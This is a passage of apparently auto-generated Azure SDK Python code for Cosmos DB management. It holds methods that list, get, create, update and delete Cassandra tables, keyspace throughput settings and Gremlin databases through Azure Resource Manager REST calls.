:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_cassandra_keyspace_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
keyspace_name=keyspace_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_cassandra_keyspace_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/settings/throughput'}
def list_cassandra_tables(
self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
"""Lists the Cassandra table under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of CassandraTable
:rtype:
~azure.mgmt.cosmosdb.models.CassandraTablePaged[~azure.mgmt.cosmosdb.models.CassandraTable]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_cassandra_tables.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.CassandraTablePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_cassandra_tables.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables'}
def get_cassandra_table(
self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Cassandra table under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: CassandraTable or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.CassandraTable or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_cassandra_table.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CassandraTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_cassandra_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}'}
def _create_update_cassandra_table_initial(
self, resource_group_name, account_name, keyspace_name, table_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_cassandra_table_parameters = models.CassandraTableCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_cassandra_table.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_cassandra_table_parameters, 'CassandraTableCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CassandraTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_cassandra_table(
self, resource_group_name, account_name, keyspace_name, table_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB Cassandra Table.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param resource: The standard JSON format of a Cassandra table
:type resource: ~azure.mgmt.cosmosdb.models.CassandraTableResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns CassandraTable or
ClientRawResponse<CassandraTable> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.CassandraTable]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.CassandraTable]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_cassandra_table_initial(
resource_group_name=resource_group_name,
account_name=account_name,
keyspace_name=keyspace_name,
table_name=table_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('CassandraTable', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_cassandra_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}'}
def _delete_cassandra_table_initial(
self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_cassandra_table.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_cassandra_table(
self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB Cassandra table.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_cassandra_table_initial(
resource_group_name=resource_group_name,
account_name=account_name,
keyspace_name=keyspace_name,
table_name=table_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_cassandra_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}'}
def get_cassandra_table_throughput(
self, resource_group_name, account_name, keyspace_name, table_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the Cassandra table under an existing Azure
Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_cassandra_table_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_cassandra_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}/settings/throughput'}
def _update_cassandra_table_throughput_initial(
self, resource_group_name, account_name, keyspace_name, table_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_cassandra_table_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_cassandra_table_throughput(
self, resource_group_name, account_name, keyspace_name, table_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB Cassandra table.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_cassandra_table_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
keyspace_name=keyspace_name,
table_name=table_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_cassandra_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/tables/{tableName}/settings/throughput'}
def list_gremlin_databases(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the Gremlin databases under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of GremlinDatabase
:rtype:
~azure.mgmt.cosmosdb.models.GremlinDatabasePaged[~azure.mgmt.cosmosdb.models.GremlinDatabase]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_gremlin_databases.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.GremlinDatabasePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_gremlin_databases.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases'}
def get_gremlin_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Gremlin databases under an existing Azure Cosmos DB database
account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: GremlinDatabase or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.GremlinDatabase or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_gremlin_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GremlinDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_gremlin_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}'}
def _create_update_gremlin_database_initial(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_gremlin_database_parameters = models.GremlinDatabaseCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_gremlin_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_gremlin_database_parameters, 'GremlinDatabaseCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('GremlinDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_gremlin_database(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB Gremlin database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a Gremlin database
:type resource: ~azure.mgmt.cosmosdb.models.GremlinDatabaseResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns GremlinDatabase or
ClientRawResponse<GremlinDatabase> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.GremlinDatabase]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.GremlinDatabase]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_gremlin_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('GremlinDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_gremlin_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}'}
def _delete_gremlin_database_initial(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_gremlin_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_gremlin_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB Gremlin database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
